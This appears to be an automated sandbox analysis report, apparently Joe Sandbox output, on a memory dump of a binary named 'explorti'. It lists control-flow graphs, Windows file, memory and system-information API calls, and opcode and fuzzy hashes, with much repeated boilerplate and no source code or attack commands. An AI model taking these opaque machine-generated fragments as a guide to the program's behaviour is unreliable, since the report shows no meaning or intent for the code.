                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1637 a36e01-a36e36 GetFileType 1638 a36eee-a36ef1 1637->1638 1639 a36e3c-a36e47 1637->1639 1640 a36ef3-a36ef6 1638->1640 1641 a36f1a-a36f42 1638->1641 1642 a36e69-a36e85 call a34020 GetFileInformationByHandle 1639->1642 1643 a36e49-a36e5a call a37177 1639->1643 1640->1641 1644 a36ef8-a36efa 1640->1644 1646 a36f44-a36f57 1641->1646 1647 a36f5f-a36f61 1641->1647 1651 a36f0b-a36f18 call a3740d 1642->1651 1659 a36e8b-a36ecd call a370c9 call a36f71 * 3 1642->1659 1655 a36e60-a36e67 1643->1655 1656 a36f07-a36f09 1643->1656 1644->1651 1652 a36efc-a36f01 call a37443 1644->1652 1646->1647 1660 a36f59-a36f5c 1646->1660 1650 a36f62-a36f70 call a1cf21 1647->1650 1651->1656 1652->1656 1655->1642 1656->1650 1673 a36ed2-a36eea call a37096 1659->1673 1660->1647 1673->1647 1676 a36eec 1673->1676 1676->1656
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00A36E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00A36E7D
                      • __dosmaperr.LIBCMT ref: 00A36F12
                        • Part of subcall function 00A37177: __dosmaperr.LIBCMT ref: 00A371AC
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 8eb6d7891f66ca89906a3bfd438bb61bf42ed82e2528b5c5217b653c1c29256d
                      • Instruction ID: 9a14a5121937a2ee9acb7806c2336ebceec13f69b732a708ffb28deccdd8d79a
                      • Opcode Fuzzy Hash: 8eb6d7891f66ca89906a3bfd438bb61bf42ed82e2528b5c5217b653c1c29256d
                      • Instruction Fuzzy Hash: B5414BB5900304BADB28EFB5E9459AFBBF9EF89300B10852DF556D3610EA31A904CB20

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1810 a3d4f4-a3d515 call a1deb0 1813 a3d517 1810->1813 1814 a3d52f-a3d532 1810->1814 1815 a3d519-a3d51f 1813->1815 1816 a3d54e-a3d55a call a3a688 1813->1816 1814->1816 1817 a3d534-a3d537 1814->1817 1818 a3d543-a3d54c call a3d43c 1815->1818 1821 a3d521-a3d525 1815->1821 1828 a3d564-a3d570 call a3d47e 1816->1828 1829 a3d55c-a3d55f 1816->1829 1817->1818 1819 a3d539-a3d53c 1817->1819 1832 a3d58c-a3d595 1818->1832 1822 a3d572-a3d582 call a37443 call a36b8a 1819->1822 1823 a3d53e-a3d541 1819->1823 1821->1816 1826 a3d527-a3d52b 1821->1826 1822->1829 1823->1818 1823->1822 1826->1822 1831 a3d52d 1826->1831 1828->1822 1844 a3d584-a3d589 1828->1844 1833 a3d6cb-a3d6da 1829->1833 1831->1818 1836 a3d5a2-a3d5b3 1832->1836 1837 a3d597-a3d59f call a38c8b 1832->1837 1842 a3d5b5-a3d5c7 1836->1842 1843 a3d5c9 1836->1843 1837->1836 1846 a3d5cb-a3d5dc 1842->1846 1843->1846 1844->1832 1847 a3d64a-a3d65a call a3d687 1846->1847 1848 a3d5de-a3d5e0 1846->1848 1859 a3d6c9 1847->1859 1860 a3d65c-a3d65e 1847->1860 1850 a3d5e6-a3d5e8 1848->1850 1851 a3d6db-a3d6dd 1848->1851 1855 a3d5f4-a3d600 1850->1855 1856 a3d5ea-a3d5ed 1850->1856 1852 a3d6e7-a3d6fa call a3651d 1851->1852 1853 a3d6df-a3d6e6 call a38cd3 1851->1853 1877 a3d708-a3d70e 1852->1877 1878 a3d6fc-a3d706 1852->1878 1853->1852 1862 a3d602-a3d617 call a3d4eb * 2 1855->1862 1863 a3d640-a3d648 1855->1863 1856->1855 1861 a3d5ef-a3d5f2 1856->1861 1859->1833 1867 a3d660-a3d676 call a3a531 1860->1867 1868 a3d699-a3d6a2 1860->1868 1861->1855 1869 a3d61a-a3d61c 1861->1869 1862->1869 1863->1847 1887 a3d6a5-a3d6a8 1867->1887 1868->1887 1869->1863 1871 a3d61e-a3d62e 1869->1871 1876 a3d630-a3d635 1871->1876 1876->1847 1881 a3d637-a3d63e 1876->1881 1883 a3d710-a3d711 1877->1883 1884 a3d727-a3d738 RtlAllocateHeap 1877->1884 1878->1877 1882 a3d73c-a3d747 call a37443 1878->1882 1881->1876 1894 a3d749-a3d74b 1882->1894 1883->1884 1888 a3d713-a3d71a call a39c81 1884->1888 1889 a3d73a 1884->1889 1892 a3d6b4-a3d6bc 1887->1892 1893 a3d6aa-a3d6ad 1887->1893 1888->1882 1899 a3d71c-a3d725 call a38cf9 1888->1899 1889->1894 1892->1859 1898 a3d6be-a3d6c6 call a3a531 1892->1898 1893->1892 1897 a3d6af-a3d6b2 1893->1897 1897->1859 1897->1892 1898->1859 1899->1882 1899->1884
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 37cff99000c0e12792c732890090739051e898e28d04af405cda4fd9283cc5ad
                      • Instruction ID: 883ebb55d6747a5d3ac6329fb592134c20b05e702e7d17816e84e6016d3f2bf7
                      • Opcode Fuzzy Hash: 37cff99000c0e12792c732890090739051e898e28d04af405cda4fd9283cc5ad
                      • Instruction Fuzzy Hash: FD612372D10224DFDF21EFA8F9866EDBBB0BB55315F24412AF459AB290D7308C01CB61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1904 a082b0-a08331 call a34020 1908 a08333-a08338 1904->1908 1909 a0833d-a08365 call a17870 call a05b20 1904->1909 1910 a0847f-a0849b call a1cf21 1908->1910 1917 a08367 1909->1917 1918 a08369-a0838b call a17870 call a05b20 1909->1918 1917->1918 1923 a0838d 1918->1923 1924 a0838f-a083a8 1918->1924 1923->1924 1927 a083d9-a08404 1924->1927 1928 a083aa-a083b9 1924->1928 1931 a08431-a08452 1927->1931 1932 a08406-a08415 1927->1932 1929 a083bb-a083c9 1928->1929 1930 a083cf-a083d6 call a1d593 1928->1930 1929->1930 1933 a0849c-a084a1 call a36b9a 1929->1933 1930->1927 1937 a08454-a08456 GetNativeSystemInfo 1931->1937 1938 a08458-a0845d 1931->1938 1935 a08427-a0842e call a1d593 1932->1935 1936 a08417-a08425 1932->1936 1935->1931 1936->1933 1936->1935 1942 a0845e-a08465 1937->1942 1938->1942 1942->1910 1944 a08467-a0846f 1942->1944 1947 a08471-a08476 1944->1947 1948 a08478-a0847b 1944->1948 1947->1910 1948->1910 1949 a0847d 1948->1949 1949->1910
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00A08454
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 537a56898267ec807bdd3525646454f71db6b125fab272e12799d874b8751850
                      • Instruction ID: 233a246249a05dee293087bfe59e47dfddaab7f1381e4df7e40e56619daed691
                      • Opcode Fuzzy Hash: 537a56898267ec807bdd3525646454f71db6b125fab272e12799d874b8751850
                      • Instruction Fuzzy Hash: D8512C71D0020C9BDB14EB78DD897DDB775EB45310F5042A8E844A72D1EF399EC48B95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1950 a08a60-a08ab7 GetTempPathA call a17870 1952 a08abc-a08af0 call a05b20 1950->1952 1955 a08af7-a08afc 1952->1955 1955->1955 1956 a08afe-a08b83 call a17f30 * 2 call a18150 1955->1956 1963 a08bb4-a08bd8 1956->1963 1964 a08b85-a08b94 1956->1964 1967 a08c05-a08c0e 1963->1967 1968 a08bda-a08be9 1963->1968 1965 a08b96-a08ba4 1964->1965 1966 a08baa-a08bb1 call a1d593 1964->1966 1965->1966 1971 a08c58-a08c5f call a36b9a 1965->1971 1966->1963 1969 a08c10-a08c1f 1967->1969 1970 a08c3b-a08c57 call a1cf21 1967->1970 1973 a08bfb-a08c02 call a1d593 1968->1973 1974 a08beb-a08bf9 1968->1974 1975 a08c31-a08c38 call a1d593 1969->1975 1976 a08c21-a08c2f 1969->1976 1973->1967 1974->1971 1974->1973 1975->1970 1976->1971 1976->1975
                      APIs
                      • GetTempPathA.KERNELBASE(00000104,?,D9F67877,?,00000000), ref: 00A08AA7
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: PathTemp
                      • String ID:
                      • API String ID: 2920410445-0
                      • Opcode ID: e80c6f534e2865e42677b3566532ea71d2e803e1ef11899c1bb2e671e1fb9e5e
                      • Instruction ID: d3cf51c81126dcfab4b6c5875d4792ccd292cbc5d12ff736b15e3fb995177d73
                      • Opcode Fuzzy Hash: e80c6f534e2865e42677b3566532ea71d2e803e1ef11899c1bb2e671e1fb9e5e
                      • Instruction Fuzzy Hash: AC51EE71A011589BEB28DB28CD85BDEB775EB46310F0082E9E449A72C2DB395B84CF94

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1986 a36c99-a36ca5 1987 a36ca7-a36cc3 call a37430 call a37443 call a36b8a 1986->1987 1988 a36cc4-a36ce8 call a34020 1986->1988 1993 a36d06-a36d28 CreateFileW 1988->1993 1994 a36cea-a36d04 call a37430 call a37443 call a36b8a 1988->1994 1998 a36d2a-a36d2e call a36e01 1993->1998 1999 a36d38-a36d3f call a36d77 1993->1999 2018 a36d72-a36d76 1994->2018 2004 a36d33-a36d36 1998->2004 2008 a36d40-a36d42 1999->2008 2004->2008 2010 a36d64-a36d67 2008->2010 2011 a36d44-a36d61 call a34020 2008->2011 2014 a36d70 2010->2014 2015 a36d69-a36d6f 2010->2015 2011->2010 2014->2018 2015->2014
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 439ec7c0f095e452c0e4ebcf5ed789cee69d299329cdf7bb3453e2888811212b
                      • Instruction ID: e8a9e3bfd20c425ac06099fca2ee9af3e63f6a3d625f08d10650346ff4887a4d
                      • Opcode Fuzzy Hash: 439ec7c0f095e452c0e4ebcf5ed789cee69d299329cdf7bb3453e2888811212b
                      • Instruction Fuzzy Hash: 81212972A016087AEB217F64AD42B9F77299F42378F208310F9343B1D1DBB0AE0596A1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2020 a36f71-a36f87 2021 a36f97-a36fa7 2020->2021 2022 a36f89-a36f8d 2020->2022 2027 a36fe7-a36fea 2021->2027 2028 a36fa9-a36fbb SystemTimeToTzSpecificLocalTime 2021->2028 2022->2021 2023 a36f8f-a36f95 2022->2023 2024 a36fec-a36ff7 call a1cf21 2023->2024 2027->2024 2028->2027 2030 a36fbd-a36fdd call a36ff8 2028->2030 2032 a36fe2-a36fe5 2030->2032 2032->2024
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00A36FB3
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: df4257ced5a4d2882920bfbd03104ad5db375b4179e5c344d17081ac4406e240
                      • Instruction ID: 9126b79e29e7bda91d274c6dd1b68a150697188d27ae453eaa8dd9362f033acf
                      • Opcode Fuzzy Hash: df4257ced5a4d2882920bfbd03104ad5db375b4179e5c344d17081ac4406e240
                      • Instruction Fuzzy Hash: 72119AB290020CBBDB14DBD5D945EDFB7BCAF48310F509266F526E6180EB34EB498B61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2033 a3d6ef-a3d6fa 2034 a3d708-a3d70e 2033->2034 2035 a3d6fc-a3d706 2033->2035 2037 a3d710-a3d711 2034->2037 2038 a3d727-a3d738 RtlAllocateHeap 2034->2038 2035->2034 2036 a3d73c-a3d747 call a37443 2035->2036 2044 a3d749-a3d74b 2036->2044 2037->2038 2040 a3d713-a3d71a call a39c81 2038->2040 2041 a3d73a 2038->2041 2040->2036 2046 a3d71c-a3d725 call a38cf9 2040->2046 2041->2044 2046->2036 2046->2038
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00A3A5ED,?,00A374AE,?,00000000,?), ref: 00A3D730
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 928bd1599a589ea84fb4867e848dae4506bf9f60d99c1aae64843adc3ef972b3
                      • Instruction ID: 3fdf1b4d03f28fb69f62be7181041937cf2e399bd67a1994790a21776561a993
                      • Opcode Fuzzy Hash: 928bd1599a589ea84fb4867e848dae4506bf9f60d99c1aae64843adc3ef972b3
                      • Instruction Fuzzy Hash: 0FF0E931A49124E69B217B22BD02A5B7BA99F817B0F195111FC04EA181CA60DC0043F1
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00A16B27,?,?,00A1D32C,00A16B27,?,00A178FB,8B18EC84,05370941), ref: 00A3AF3E
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: fd0eb84ac04b94404461c130d6bba26dbda9890bd185b607c19a576cd0f8afc7
                      • Instruction ID: ef6aa3226a341740144f14f73ac32507191b6fcbfca5cf4d6be35d3815837362
                      • Opcode Fuzzy Hash: fd0eb84ac04b94404461c130d6bba26dbda9890bd185b607c19a576cd0f8afc7
                      • Instruction Fuzzy Hash: 88E022B260E6326AEB2033656D02B6B768C8FB23B1F054050FC85920C0DF64CC0082E3
                      Memory Dump Source
                      • Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6b6d725fa73d15b9f231e70ab5d67852caa3801dd0eee5b0babd99229c1dff77
                      • Instruction ID: a22bb2ddb6d65598db91bce9ddb720499e092f80af66a7ab7a6ee7407522be86
                      • Opcode Fuzzy Hash: 6b6d725fa73d15b9f231e70ab5d67852caa3801dd0eee5b0babd99229c1dff77
                      • Instruction Fuzzy Hash: 402160EB14C135BD704AC1422F68AFB5BEFE1D27303318427F807DA986D2D94A8E1171
                      Memory Dump Source
                      • Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 011e2c151a924d12d003f470c7c55a7e678df075cebd9cbe54eb256c7c68c296
                      • Instruction ID: 568b82ae30e24efb46c90ef2f2f9d69037169e43478f05414d442ebc30a5e9aa
                      • Opcode Fuzzy Hash: 011e2c151a924d12d003f470c7c55a7e678df075cebd9cbe54eb256c7c68c296
                      • Instruction Fuzzy Hash: 693174EB14C135BD700AC5416F68AFB6BEEE5D27303308827F843DA986D2D55A4D5172
                      Memory Dump Source
                      • Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9e34234447d7607255f442f39c6f458dcc6902a0ccc839d7b7ac3efc484ddc50
                      • Instruction ID: d25633da3cc4730fe432715f239bc2a4b5eebbfb097d9bc211af2f996cfcf013
                      • Opcode Fuzzy Hash: 9e34234447d7607255f442f39c6f458dcc6902a0ccc839d7b7ac3efc484ddc50
                      • Instruction Fuzzy Hash: CF2191EB14C135BDB409C1466F68AFB1BDFE1D27303308427F803DA9C6E2D95A995171
                      Memory Dump Source
                      • Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b47878e7b042985998a86253ab52c4e2bfcaf188c02207dc79778ed5b7ba359
                      • Instruction ID: 6bebd3b79f48d2ebbd70405e03f6437089ab182c5878b002f97c376cdf4cf493
                      • Opcode Fuzzy Hash: 5b47878e7b042985998a86253ab52c4e2bfcaf188c02207dc79778ed5b7ba359
                      • Instruction Fuzzy Hash: DC213CEB14C135BD7006C1463F68AFB6BDEE1D2B303318827F847D9986E2D95A8A5171
                      Memory Dump Source
                      • Source File: 00000007.00000002.2898233490.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_53e0000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fdfd6630e55014d12a52e49460f7de1e4557a6c7f928e018c70bc4dc4adbabc0
                      • Instruction ID: e95a159cd8305890a983fa19e929b5db2619b394b1688613a65314a24eeb4fbc
                      • Opcode Fuzzy Hash: fdfd6630e55014d12a52e49460f7de1e4557a6c7f928e018c70bc4dc4adbabc0
                      • Instruction Fuzzy Hash: 60117FEF14C134BD7406C1466F68AFB6BDFE1D27303308426F807DA986E2D95A8D5172
                      Memory Dump Source
